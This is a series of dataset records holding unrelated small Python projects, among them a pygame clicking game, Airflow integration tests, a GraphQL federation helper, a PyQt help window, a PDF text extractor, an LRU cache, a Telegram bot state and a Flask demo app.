\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"557031721","text":"import pygame\r\nimport sys\r\nfrom pygame.draw import *\r\nfrom random import randint\r\npygame.init()\r\n\r\nprint('Hello! Please enter your name:')\r\nname = input()\r\n\r\nFPS = 20\r\nscreen = pygame.display.set_mode((1200, 800))\r\n\r\nRED = (255, 0, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nGREEN = (0, 255, 0)\r\nMAGENTA = (255, 0, 255)\r\nCYAN = (0, 255, 255)\r\nBLACK = (0, 0, 0)\r\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\r\n\r\nrect(screen, (255, 255, 255), (50, 50, 1100, 700))\r\n\r\nscore = 0\r\ncheck = [6, 6]\r\nx = [0, 0]\r\ny = [0, 0]\r\nr = [0, 0]\r\nvx = [0, 0]\r\nvy = [0, 0]\r\ncolor = [RED, RED]\r\nmaxtime = [10, 10]\r\n\r\n\r\ndef new_ball(a): \r\n '''Create a ball \r\n x, y coordinates of a ball\r\n r - radius of a ball\r\n vx, vy - speed of a ball\r\n color - colour of a ball\r\n maxtime - lifetime of a ball'''\r\n global x, y, r, vx, vy, color, maxtime\r\n x[a] = randint(150, 1050)\r\n y[a] = randint(150, 650)\r\n r[a] = randint(10, 100)\r\n vx[a] = randint(-15, 15) \r\n vy[a] = randint(-15, 15) \r\n color[a] = COLORS[randint(0, 5)]\r\n maxtime[a] = randint(10, 50)\r\n circle(screen, color[a], (x[a], y[a]), r[a])\r\n \r\ndef move_ball(a):\r\n global x, y, r, color, vx, vy, maxtime\r\n if x[a] <= 50 + r[a] or x[a] >= 1150 - r[a]:\r\n vx[a] = -vx[a]\r\n if y[a] <= 50 + r[a] or y[a] >= 750 - r[a]:\r\n vy[a] = -vy[a]\r\n x[a] = x[a] + vx[a]\r\n y[a] = y[a] + vy[a]\r\n circle(screen, color[a], (x[a], y[a]), r[a])\r\n \r\nx2 = [0, 0]\r\ny2 = [0, 0]\r\nr2 = [0, 0]\r\nvx2 = [0, 0]\r\nvy2 = [0, 0]\r\ncolor2 = [RED, RED]\r\nmaxtime2 = [10, 10]\r\ncurent_time = [0, 0]\r\ntime_of_motion = [5, 5]\r\ncheck2 = [6, 6]\r\ntime = [0, 0]\r\ncurrent_time_of_game = 0\r\nt = 0\r\n \r\ndef new_square(a): \r\n '''Create a square\r\n x2, y2 - coordinates of a square\r\n r2 - half of lenth of side of square\r\n vx2, vy2 - speed of a square\r\n color2 - colour of a square\r\n maxtime2 - lifetime of a 
square'''\r\n global x2, y2, r2, vx2, vy2, color2, maxtime2\r\n x2[a] = randint(150, 1050)\r\n y2[a] = randint(150, 650)\r\n r2[a] = randint(20, 40)\r\n vx2[a] = randint(-10, 10) \r\n vy2[a] = randint(-10, 10) \r\n color2[a] = COLORS[randint(0, 5)]\r\n maxtime2[a] = randint(10, 50)\r\n time_of_motion[a] = randint(5, 10)\r\n curent_time[a] = 0\r\n rect(screen, color2[a], (x2[a], y2[a], r2[a] * 2, r2[a] * 2))\r\n \r\n\r\ndef move_square(a):\r\n global x2, y2, r2, color2, vx2, vy2, maxtime2\r\n if curent_time[a] >= time_of_motion[a]:\r\n time_of_motion[a] = randint(5, 10)\r\n vx2[a] = randint(-15, 15)\r\n vy2[a] = randint(-15, 15)\r\n curent_time[a] = 0\r\n else:\r\n curent_time[a] = curent_time[a] + 1\r\n if x2[a] <= 50 or x2[a] >= 1150 - 2 * r2[a]:\r\n vx2[a] = -vx2[a]\r\n if y2[a] <= 50 or y2[a] >= 750 - 2 * r2[a]:\r\n vy2[a] = -vy2[a]\r\n \r\n x2[a] = x2[a] + vx2[a]\r\n y2[a] = y2[a] + vy2[a]\r\n rect(screen, color2[a], (x2[a], y2[a], 2 * r2[a], 2 * r2[a]))\r\n\r\n\r\ndef board(name, score):\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n old_board = board.read().split()\r\n lenth = len(old_board) // 2\r\n name_of_player = [0 for i in range(lenth)]\r\n score_of_player = [0 for i in range(lenth)]\r\n k = -1\r\n for i in range(lenth):\r\n name_of_player[i] = old_board[i * 2]\r\n if name_of_player[i] == name:\r\n k = i\r\n score_of_player[i] = int(old_board[i * 2 + 1])\r\n flag = True\r\n if k < 0: #if this is a new player\r\n name_of_player.append(name)\r\n score_of_player.append(score)\r\n i = 0\r\n while score > score_of_player[lenth - 1 - i] and i != lenth:\r\n score_of_player[lenth - i] = score_of_player[lenth - 1 - i]\r\n name_of_player[lenth - i] = name_of_player[lenth - 1 - i]\r\n name_of_player[lenth - 1 - i] = name\r\n score_of_player[lenth - 1 - i] = score\r\n i = i + 1\r\n new_board = ''\r\n for i in range(lenth + 1):\r\n new_board = new_board + str(name_of_player[i]) + ' ' + str(score_of_player[i]) + '\\n' \r\n else:\r\n if score > score_of_player[k]:\r\n score_of_player[k] = score\r\n while score > score_of_player[k - 1] and k != 0:\r\n score_of_player[k] = score_of_player[k - 1]\r\n name_of_player[k] = name_of_player[k - 1]\r\n score_of_player[k - 1] = score\r\n name_of_player[k - 1] = name\r\n k = k - 1\r\n new_board = ''\r\n for i in range(lenth):\r\n new_board = new_board + str(name_of_player[i]) + ' ' + str(score_of_player[i]) + '\\n' \r\n with open('C:/Task1/homework/WORK_6/score.txt', 'w') as board:\r\n board.write(new_board)\r\n \r\n \r\ndef text(s, f, x, y):\r\n f1 = pygame.font.Font(None, f)\r\n text1 = f1.render(s, True, (225, 225, 225))\r\n screen.blit(text1, (x, y))\r\n \r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\nfinished = False\r\n\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n print('Your score: ',score)\r\n board(name, score)\r\n print('Board of leaders:')\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n print(board.read())\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n for i in range(2):\r\n d2 = (event.pos[0] - x[i]) ** 2 + (event.pos[1] - y[i]) ** 2\r\n if d2 <= r[i] ** 2:\r\n score = score + 1\r\n new_ball(i)\r\n for i in range(2):\r\n if abs(event.pos[0] - r2[i] - x2[i]) <= r2[i] and abs(event.pos[1] - r2[i] - y2[i]) <= r2[i]:\r\n score = score + 2\r\n new_square(i)\r\n for i in range(2):\r\n if check[i] <= maxtime[i]:\r\n move_ball(i)\r\n check[i] = check[i] + 1\r\n else:\r\n new_ball(i)\r\n 
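In the menu.py record further above, start_game_if_alone rewrites the emulator command in place with an index loop, a deepcopy, and a find() guard; a more compact equivalent is sketched here (the helper name is an assumption), since str.replace is already a no-op for parts that do not contain the placeholder:

def build_command(emulator_command, rom_path):
    # expand every %ROM% placeholder; parts without it pass through unchanged,
    # and the comprehension builds a fresh list so the template stays intact
    return [part.replace('%ROM%', rom_path) for part in emulator_command]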
check[i] = 0\r\n for i in range(2):\r\n if check2[i] <= maxtime2[i]:\r\n move_square(i)\r\n check2[i] = check2[i] + 1\r\n else:\r\n new_square(i)\r\n check2[i] = 0\r\n pygame.display.update()\r\n screen.fill(BLACK)\r\n rect(screen, (255, 255, 255), (50, 50, 1100, 700))\r\n rect(screen, (0, 0, 0), (51, 51, 1098, 698))\r\n text('Score:' + str(score), 20, 10, 10)\r\n t = t + 1 #time\r\n if t % 2 == 0:\r\n current_time_of_game = current_time_of_game + 0.1\r\n text('Time:' + str(30 - round(current_time_of_game)), 20, 100, 10)\r\n if current_time_of_game // 1 == 30:\r\n finished = True\r\n print('Your score:', score)\r\n print('Board of leaders:')\r\n board(name, score)\r\n with open('C:/Task1/homework/WORK_6/score.txt', 'r') as board:\r\n print(board.read())\r\n\r\npygame.quit()\r\n\r\nwait = input()","sub_path":"LAB_6/balls+score.py","file_name":"balls+score.py","file_ext":"py","file_size_in_byte":6878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"429423415","text":"import os\nimport subprocess\nimport tempfile\n\nimport pytest\n\nfrom prefect import Flow, Task, task, triggers\nfrom prefect.tasks.airflow import AirflowTask, AirflowTriggerDAG\nfrom prefect.tasks.shell import ShellTask\n\npytestmark = pytest.mark.airflow\n\n\n@pytest.fixture(scope=\"module\")\ndef airflow_settings():\n with tempfile.NamedTemporaryFile(\n prefix=\"prefect-airflow\", suffix=\"prefect-airflow-test.db\"\n ) as tmp:\n env = os.environ.copy()\n env[\"AIRFLOW__CORE__SQL_ALCHEMY_CONN\"] = \"sqlite:///\" + tmp.name\n env[\"db_conn\"] = tmp.name\n dag_folder = os.path.join(os.path.dirname(__file__), \"dags\")\n env[\"AIRFLOW__CORE__DAGS_FOLDER\"] = dag_folder\n status = subprocess.check_output(\n [\n \"bash\",\n \"-c\",\n \"source deactivate && source activate airflow && airflow initdb\",\n ],\n env=env,\n )\n yield {\n k: v for k, v in env.items() if k.startswith(\"AIRFLOW\") or k == \"db_conn\"\n }\n\n\nclass TestTaskStructure:\n def test_init_requires_task_and_dag_id(self):\n with pytest.raises(TypeError):\n task = AirflowTask()\n\n with pytest.raises(TypeError):\n task = AirflowTask(task_id=\"task name\")\n\n with pytest.raises(TypeError):\n task = AirflowTask(dag_id=\"dag name\")\n\n def test_name_defaults_to_task_id_but_can_be_changed(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\")\n assert t1.name == \"test-task\"\n\n t2 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\", name=\"unique\")\n assert t2.name == \"unique\"\n\n def test_command_responds_to_env_name(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\")\n assert t1.helper_script == \"source deactivate && source activate airflow\"\n\n t2 = AirflowTask(\n task_id=\"test-task\", dag_id=\"blob\", airflow_env=\"airflow_conda_env\"\n )\n assert (\n t2.helper_script == \"source deactivate && source activate airflow_conda_env\"\n )\n\n def test_command_responds_to_cli_flags(self):\n t1 = AirflowTask(task_id=\"test-task\", dag_id=\"blob\", cli_flags=[\"--force\"])\n assert t1.command.startswith(\"airflow run --force\")\n\n\nclass TestSingleTaskRuns:\n def test_airflow_task_successfully_runs_a_task(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"also_run_this\",\n dag_id=\"example_bash_operator\",\n env=airflow_settings,\n )\n\n flow = Flow(name=\"test single task\", tasks=[task])\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[task].is_successful()\n assert 
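The board() function in the balls+score.py record above hand-rolls an insertion sort over a flat "name score" text file. A shorter sketch with the same two-column file format (the helper name is an assumption; it keeps each player's best score and rewrites the file sorted high-to-low):

def update_board(path, name, score):
    with open(path) as f:
        tokens = f.read().split()
    # pairs of (name, score) flattened into one token stream, as in the record above
    scores = {tokens[i]: int(tokens[i + 1]) for i in range(0, len(tokens), 2)}
    scores[name] = max(score, scores.get(name, score))  # keep the best score per player
    with open(path, 'w') as f:
        for n, s in sorted(scores.items(), key=lambda kv: -kv[1]):
            f.write('{} {}\n'.format(n, s))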
flow_state.result[task].result is None\n\n def test_airflow_task_uses_its_own_trigger_rules_by_default(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"run_this_last\",\n dag_id=\"example_bash_operator\",\n env=airflow_settings,\n )\n\n with Flow(name=\"test single task\") as flow:\n res = task(execution_date=\"2011-01-01\")\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[res].is_skipped()\n\n def test_airflow_task_uses_cli_flags(self, airflow_settings):\n task = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"run_this_last\",\n dag_id=\"example_bash_operator\",\n cli_flags=[\"-A\"],\n env=airflow_settings,\n )\n\n with Flow(name=\"test single task\") as flow:\n res = task(execution_date=\"2011-01-02\")\n flow_state = flow.run()\n\n assert flow_state.is_successful()\n assert flow_state.result[res].is_successful()\n assert not flow_state.result[res].is_skipped()\n assert flow_state.result[res].result is None\n\n def test_airflow_task_checks_db_state_prior_to_execution(self, airflow_settings):\n pass\n\n def test_airflow_task_converts_xcoms_to_return_values(self, airflow_settings):\n puller = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"puller\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n push = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"push\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n push_by_returning = AirflowTask(\n db_conn=airflow_settings[\"db_conn\"],\n task_id=\"push_by_returning\",\n dag_id=\"example_xcom\",\n env=airflow_settings,\n execution_date=\"1999-09-20\",\n )\n\n with Flow(name=\"xcom\") as flow:\n res = puller(upstream_tasks=[push, push_by_returning])\n\n flow_state = flow.run()\n assert flow_state.is_successful()\n\n # puller\n assert flow_state.result[res].is_successful()\n assert flow_state.result[res].result is None\n\n # push\n assert flow_state.result[push].is_successful()\n assert flow_state.result[push].result == [1, 2, 3]\n\n # push_by_returning\n assert flow_state.result[push_by_returning].is_successful()\n assert flow_state.result[push_by_returning].result == {\"a\": \"b\"}\n\n\nclass TestTriggerDAG:\n def test_basic_trigger_dag_triggers(self, airflow_settings):\n task = AirflowTriggerDAG(\n dag_id=\"tutorial\", execution_date=\"1986-09-20\", env=airflow_settings\n )\n check_task = ShellTask(\n command=\"airflow list_dag_runs tutorial\",\n helper_script=task.helper_script,\n env=airflow_settings,\n )\n\n with Flow(name=\"tutorial\") as flow:\n res = check_task(upstream_tasks=[task])\n\n flow_state = flow.run()\n assert flow_state.is_successful()\n\n check_state = flow_state.result[res]\n assert check_state.is_successful()\n\n # check CLI output\n assert \"manual__1986-09-20T00:00:00+00:00\" in check_state.result\n assert \"running\" in check_state.result\n assert \"1986-09-20T00:00:00+00:00\" in check_state.result\n","sub_path":"tests/tasks/airflow/test_airflow.py","file_name":"test_airflow.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"461126251","text":"from collections import defaultdict\n\nfrom django.conf import settings\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_federation import build_schema\nfrom graphene_federation.entity import custom_entities\nfrom graphql import 
GraphQLError\n\nfrom ..channel import ChannelContext\nfrom .utils import from_global_id_or_error\n\n\ndef build_federated_schema(query=None, mutation=None, **kwargs):\n schema = build_schema(query, mutation, **kwargs)\n set_entity_resolver(schema)\n set_entity_type_resolver(schema)\n return schema\n\n\ndef set_entity_resolver(schema):\n \"\"\"Set type resolver aware of ChannelContext on _Entity union.\"\"\"\n entity = schema.get_type(\"Query\")\n entity.fields[\"_entities\"].resolver = resolve_entities\n\n\ndef resolve_entities(parent, info, representations):\n max_representations = settings.FEDERATED_QUERY_MAX_ENTITIES\n if max_representations and len(representations) > max_representations:\n representations_count = len(representations)\n raise GraphQLError(\n f\"Federated query exceeded entity limit: {representations_count} \"\n f\"items requested over {max_representations}.\"\n )\n\n resolvers = {}\n for representation in representations:\n if representation[\"__typename\"] not in resolvers:\n try:\n model = custom_entities[representation[\"__typename\"]]\n resolvers[representation[\"__typename\"]] = getattr(\n model, \"_%s__resolve_references\" % representation[\"__typename\"]\n )\n except AttributeError:\n pass\n\n batches = defaultdict(list)\n for representation in representations:\n model = custom_entities[representation[\"__typename\"]]\n model_arguments = representation.copy()\n typename = model_arguments.pop(\"__typename\")\n model_arguments = {to_snake_case(k): v for k, v in model_arguments.items()}\n model_instance = model(**model_arguments)\n batches[typename].append(model_instance)\n\n entities = []\n for typename, batch in batches.items():\n if typename not in resolvers:\n continue\n\n resolver = resolvers[typename]\n entities.extend(resolver(batch, info))\n\n return entities\n\n\ndef set_entity_type_resolver(schema):\n \"\"\"Set type resolver aware of ChannelContext on _Entity union.\"\"\"\n entity = schema.get_type(\"_Entity\")\n\n def resolve_entity_type(instance, info):\n # Use new strategy to resolve GraphQL Type for `ObjectType`\n if isinstance(instance, ChannelContext):\n model = type(instance.node)\n else:\n model = type(instance)\n\n model_type = schema.get_type(model._meta.object_name)\n if model_type is None:\n raise ValueError(\n f\"GraphQL type for model {model} could not be found. 
\"\n \"This is caused by federated type missing get_model method.\"\n )\n\n return model_type\n\n entity.resolve_type = resolve_entity_type\n\n\ndef resolve_federation_references(graphql_type, roots, queryset):\n ids = [\n from_global_id_or_error(root.id, graphql_type, raise_error=True)[1]\n for root in roots\n ]\n objects = {str(obj.id): obj for obj in queryset.filter(id__in=ids)}\n return [objects.get(root_id) for root_id in ids]\n","sub_path":"saleor/graphql/core/federation.py","file_name":"federation.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"494396579","text":"# -*- coding: cp1252 -*-\n\nimport sys\nimport os\nfrom player import Player\nfrom PyQt4 import QtGui, QtCore, Qt\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass TelaAjudaTutoriais(QtGui.QMainWindow):\n def __init__(self):\n super(TelaAjudaTutoriais, self).__init__()\n cursor = QtGui.QCursor(QtGui.QPixmap('icons\\\\pointingHand.png'))\n ###########################################################\n\n self.setObjectName(_fromUtf8(\"self\"))\n self.resize(633, 611)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(_fromUtf8(\"icons\\\\logo lepe.png\")), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setStyleSheet(_fromUtf8(\"background-image: url(:ajuda.jpg);\\n\"\n\"\"))\n self.centralwidget = QtGui.QWidget(self)\n self.centralwidget.setObjectName(_fromUtf8(\"centralwidget\"))\n\n self.voltarBt = QtGui.QPushButton(self.centralwidget)\n self.voltarBt.setGeometry(QtCore.QRect(520, 560, 75, 23))\n self.voltarBt.setObjectName(_fromUtf8(\"voltarBt\"))\n self.voltarBt.setCursor(cursor)\n\n self.tutorialWidget = QtGui.QWidget(self.centralwidget)\n self.tutorialWidget.setGeometry(QtCore.QRect(40, 30, 553, 376))\n self.tutorialWidget.setStyleSheet(_fromUtf8(\"background-color: rgb(63, 63, 63);\"))\n \n self.tutorialWidget.setObjectName(_fromUtf8(\"tutorialWidget\"))\n\n self.tutorial1Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial1Bt.setGeometry(QtCore.QRect(40, 440, 181, 71))\n self.tutorial1Bt.setCursor(cursor)\n\n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial1Bt.setFont(font)\n\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(_fromUtf8(\"icons\\\\arrow.png\")), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n self.tutorial1Bt.setIcon(icon1)\n self.tutorial1Bt.setObjectName(_fromUtf8(\"tutorial1Bt\"))\n self.tutorial2Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial2Bt.setGeometry(QtCore.QRect(420, 440, 181, 71))\n self.tutorial2Bt.setCursor(cursor)\n\n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial2Bt.setFont(font)\n self.tutorial2Bt.setIcon(icon1)\n self.tutorial2Bt.setObjectName(_fromUtf8(\"tutorial2Bt\"))\n self.tutorial3Bt = QtGui.QPushButton(self.centralwidget)\n self.tutorial3Bt.setGeometry(QtCore.QRect(230, 440, 181, 71))\n self.tutorial3Bt.setCursor(cursor)\n \n font = QtGui.QFont()\n font.setPointSize(14)\n\n self.tutorial3Bt.setFont(font)\n self.tutorial3Bt.setIcon(icon1)\n self.tutorial3Bt.setObjectName(_fromUtf8(\"tutorial3Bt\"))\n self.setCentralWidget(self.centralwidget)\n\n self.statusbar = QtGui.QStatusBar(self)\n self.statusbar.setObjectName(_fromUtf8(\"statusbar\"))\n self.setStatusBar(self.statusbar)\n\n self.setWindowTitle(\"Ajuda - Tutoriais\")\n self.voltarBt.setText(\"Voltar\")\n self.tutorial1Bt.setText(\"Escolhendo\\num nível\")\n 
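resolve_federation_references in the record above answers in the originally requested order by indexing the queryset results by id; a toy illustration of that pattern (Row and ordered_lookup are hypothetical names, not part of the original):

class Row:
    def __init__(self, id):
        self.id = id

def ordered_lookup(requested_ids, rows):
    # rows may arrive from the database in any order; index them by id so the
    # output follows the request, with None placeholders for ids not returned
    by_id = {str(r.id): r for r in rows}
    return [by_id.get(i) for i in requested_ids]

rows = ordered_lookup(['1', '3'], [Row(3), Row(1)])  # re-ordered to match the request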
self.tutorial2Bt.setText(\"Avaliação\\nQuantitativa\")\n self.tutorial3Bt.setText(\"Avaliação\\nQualitativa\")\n\n \n ###########################################################\n \n self.__player1 = Player(self.tutorialWidget)\n\n palette\t= QtGui.QPalette()\n self.setAutoFillBackground(True)\n img = QtGui.QPixmap(\"background\\\\ajuda.jpg\")\n img = img.scaled(QtCore.QSize(self.width(), self.height()))\n palette.setBrush(palette.Background, QtGui.QBrush(img))\n self.setPalette(palette)\n\n self.setMaximumHeight(self.height())\n self.setMaximumWidth(self.width())\n self.setMinimumHeight(self.height())\n self.setMinimumWidth(self.width())\n self.show()\n\n self.__player1.carregar(\"niveis\\\\nivel 1\\\\conts\\\\Cores\\\\video\\\\1- CORES ok.avi\")\n self.tutorial1Bt.clicked.connect(self.mostrarTutorial1)\n self.tutorial2Bt.clicked.connect(self.mostrarTutorial2)\n self.tutorial3Bt.clicked.connect(self.mostrarTutorial3)\n \n self.voltarBt.clicked.connect(self.voltar)\n\n def mostrarTutorial1(self):\n self.__player1.carregar(\"ajuda\\\\tutorial1.avi\")\n\n def mostrarTutorial2(self):\n self.__player1.carregar(\"ajuda\\\\tutorial2.avi\") \n\n def mostrarTutorial3(self):\n self.__player1.carregar(\"ajuda\\\\tutorial3.avi\") \n \n def voltar(self,e):\n #self.a = ajudaMenuInicial.TelaAjuda()\n #self.a.show()\n self.close()\n\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n window = TelaAjudaTutoriais()\n app.exec_()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/ajudaTutoriais.py","file_name":"ajudaTutoriais.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67101529","text":"#!/usr/bin/python3\n#Script to parse local pizza menu\n#import pypdf\nimport PyPDF2\n\ndef extract_information(pdf_path):\n with open(pdf_path, 'rb') as f:\n read_pdf = PyPDF2.PdfFileReader(pdf_path)\n number_of_pages = read_pdf.getNumPages()\n\n for page_number in range(number_of_pages):\n page = read_pdf.getPage(page_number)\n page_content = page.extractText()\n print(page_content)\n\nif __name__ == '__main__':\n path = '/PATH/TO/FILE.pdf'\n extract_information(path)\n","sub_path":"Scripts/menuparse.py","file_name":"menuparse.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"178845302","text":"# snapchat google microsoft\n'''\nDesign and implement a data structure for Least Recently Used (LRU) cache. It should support the following operations: get and put.\n\nget(key) - Get the value (will always be positive) of the key if the key exists in the cache, otherwise return -1.\nput(key, value) - Set or insert the value if the key is not already present. 
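The menuparse.py record above targets the legacy PyPDF2 1.x API; PdfFileReader, getNumPages, getPage, and extractText were all removed in PyPDF2 3.x. A sketch of the modern spelling, assuming the same goal of dumping each page's text:

from PyPDF2 import PdfReader

def extract_information(pdf_path):
    reader = PdfReader(pdf_path)       # replaces PdfFileReader
    for page in reader.pages:          # replaces getNumPages()/getPage()
        print(page.extract_text())     # replaces extractText()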
When the cache has reached its capacity, it should invalidate the least recently used item before inserting a new item.\n\nFollow up:\nCould you do both operations in O(1) time complexity?\n\nExample:\n\nLRUCache cache = new LRUCache( 2 /* capacity */ );\n\ncache.put(1, 1);\ncache.put(2, 2);\ncache.get(1); // returns 1\ncache.put(3, 3); // evicts key 2\ncache.get(2); // returns -1 (not found)\ncache.put(4, 4); // evicts key 1\ncache.get(1); // returns -1 (not found)\ncache.get(3); // returns 3\ncache.get(4); // returns 4\n'''\nclass DLinkedNode:\n    def __init__(self, key=-1, val=-1):\n        self.key = key\n        self.val = val\n        self.prev = None\n        self.next = None\n\nclass LRUCache:\n\n    def __init__(self, capacity):\n        \"\"\"\n        :type capacity: int\n        \"\"\"\n        self.capacity = capacity\n        self.cache = dict()\n        self.head, self.tail = DLinkedNode(), DLinkedNode()\n        self.head.next = self.tail\n        self.tail.prev = self.head\n\n    def get(self, key):\n        \"\"\"\n        :type key: int\n        :rtype: int\n        \"\"\"\n        if key not in self.cache: return -1\n        node = self.cache[key]\n        self.__remove_node(node)\n        self.__add_node(node)\n        return node.val\n\n    def put(self, key, value):\n        \"\"\"\n        :type key: int\n        :type value: int\n        :rtype: void\n        \"\"\"\n        if key in self.cache:\n            node = self.cache[key]\n            node.val = value\n            self.__remove_node(node)\n        else:\n            if len(self.cache) == self.capacity:\n                self.cache.pop(self.tail.prev.key)\n                self.__remove_node(self.tail.prev)\n            node = DLinkedNode(key, value)\n            self.cache[key] = node\n        self.__add_node(node)\n\n    def __remove_node(self, node):\n        node.prev.next = node.next\n        node.next.prev = node.prev\n\n    def __add_node(self, node):\n        node.next = self.head.next\n        self.head.next.prev = node\n        self.head.next = node\n        node.prev = self.head\n\ncache = LRUCache(2)\ncache.put(1, 1)\ncache.put(2, 2)\nprint(cache.get(1)) # returns 1\ncache.put(3, 3) # evicts key 2\nprint(cache.get(2)) # returns -1 (not found)\ncache.put(4, 4) # evicts key 1\nprint(cache.get(1)) # returns -1 (not found)\nprint(cache.get(3)) # returns 3\nprint(cache.get(4)) # returns 4\n","sub_path":"leetcode/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"164541157","text":"from telegram import Update, ReplyKeyboardMarkup\r\nfrom telegram.ext import MessageHandler, Filters, CallbackContext\r\n\r\nfrom bot.resources import keyboards, messages\r\nfrom bot.states import names\r\nfrom bot.states.common import back\r\nfrom extensions import State\r\n\r\n\r\ndef activator(update: Update, context: CallbackContext):\r\n    reply_markup = ReplyKeyboardMarkup(keyboards.YES_NO, resize_keyboard=True)\r\n    update.message.reply_text(messages.MSG_FOR_ALL.format(context.chat_data['current_message']),\r\n                              reply_markup=reply_markup)\r\n\r\n\r\ndef yes(update: Update, context: CallbackContext):\r\n    # Send the message out to the users\r\n    return names.HELLO_HABIT_MENU\r\n\r\ndef no(update: Update, context: CallbackContext):\r\n    # Send the message out to the users\r\n    return names.HELLO_HABIT_MENU\r\n\r\n\r\nmessage_send_state = State(\r\n    on_activate=activator,\r\n    handlers=[\r\n        MessageHandler(Filters.regex(f'({keyboards.BACK_BUTTON})'), back),\r\n        MessageHandler(Filters.regex(f'({keyboards.YES_BUTTON})'), yes),\r\n        MessageHandler(Filters.regex(f'({keyboards.NO_BUTTON})'), no),\r\n    
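The hand-built doubly linked list in the LRUCache record above is the classic O(1) design; the same interface can also be sketched on top of collections.OrderedDict, which tracks recency order for you (class name is an assumption):

from collections import OrderedDict

class LRUCacheOD:
    def __init__(self, capacity):
        self.capacity = capacity
        self.od = OrderedDict()

    def get(self, key):
        if key not in self.od:
            return -1
        self.od.move_to_end(key)  # mark as most recently used
        return self.od[key]

    def put(self, key, value):
        if key in self.od:
            self.od.move_to_end(key)
        self.od[key] = value
        if len(self.od) > self.capacity:
            self.od.popitem(last=False)  # evict the least recently used entry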
]\r\n)\r\n","sub_path":"bot/states/message/message_send.py","file_name":"message_send.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"512571212","text":"num = int(input('Enter an integer: '))\r\nprint('''Choose one of the bases for conversion:\r\n[1] convert to binary\r\n[2] convert to octal\r\n[3] convert to hexadecimal''')\r\nopcao = int(input('Your choice: '))\r\n\r\nif opcao == 1:\r\n    print(bin(num)[2:])\r\nelif opcao == 2:\r\n    print(oct(num)[2:])\r\nelif opcao == 3:\r\n    print(hex(num)[2:])\r\nelse:\r\n    print('Invalid option!!!')\r\n\r\n","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"365194597","text":"# -*- coding:utf-8 -*-\n\nfrom flask import Flask, render_template\n# template for display\nfrom flask import request, flash, url_for, redirect\n# lib for login\n\nfrom article import Article\nfrom course import Course\n# import class for articles, courses\n\nfrom flask_modus import Modus\n# method overriding for PATCH/DELETE requests\n\napp = Flask(__name__)\nmodus = Modus(app)\n\n\napp.secret_key = b'development key'\n\narticle_list = [Article('Sample_Name', 'Sample_Essay')]\ncourse_list = [Course('Sample_Course', 'Sample_Name', '24')]\n\n@app.route(\"/\")\ndef index():\n    return render_template('index.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    if request.method == 'POST':\n        if request.form['username'] == u'北京林业大学':\n            if request.form['password'] == u'123456':\n                # return u\"Welcome, \" + request.form['username']\n                flash('You were successfully logged in')\n                return redirect(url_for('index'))\n            else:\n                return request.form['username'] + u': incorrect password'\n        else:\n            return u'No such user: ' + request.form['username']\n    else:\n        return u'Invalid HTTP method'\n\n\n@app.route(\"/articles\", methods=['GET', 'POST'])\ndef articles():\n    if request.method == 'POST':\n        new_article = Article(request.form['author'], request.form['content'])\n        article_list.append(new_article)\n        return 